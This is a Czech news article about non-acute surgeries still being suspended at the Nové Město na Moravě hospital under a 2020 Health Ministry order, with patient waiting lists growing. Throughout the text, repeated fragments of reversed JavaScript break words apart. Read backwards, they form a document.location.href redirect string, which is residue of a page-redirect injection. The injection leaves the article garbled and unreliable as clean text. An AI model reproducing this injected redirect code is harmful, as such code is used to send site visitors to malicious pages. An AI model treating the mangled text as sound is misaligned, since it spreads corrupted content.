Rainbow page separator

Neakutní operace se stále provádět nemohou, čekajících přibývá

Sobota, 3. dubna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / I nadále platí, že pacienti zatím nemohou pods[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit neakutní operace. Na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to skutečnost upozorňuje novoměstská nemocnice, která se v souvislosti s pozastavením neakutní operativy řídí mimořádným opatřením Ministerstva zdravotnictví České republiky z 31. 12. 2020 a současně také nepříznivou epidemiologickou situací v regionu.
Na naplánované neakutní operace pacienti čekají již dlouhou řadu měsíců; odloženy byly tisíce operačních zákroků. Operace, jako jsou kupříkladu kloubní náhrady, křečové žíly, kýly, neakutní operace žlučníku či prostaty a mnoho dalších, se přestaly provádět v polovině října, poté koncem lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu Kraj Vysočina coby zřizovatel zdravotnického zařízení na základě rozhodnutí vlády opět přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupil k alespoň částečnému obnovení provádění neakutních zákroků. Nicméně vzhledem k následujícímu ministerskému zákazu z konce roku zůstalo velké množství pacientů neuspokojeno a počet dalších, kterým by pomohla jedině operace, stále narůstá. Už loni před koncem roku bylo ze statistik patrné, že běžná operativa klesla v nemocnicích Kraje Vysočina oproti stejnému období roku 2019 na méně než polovinu.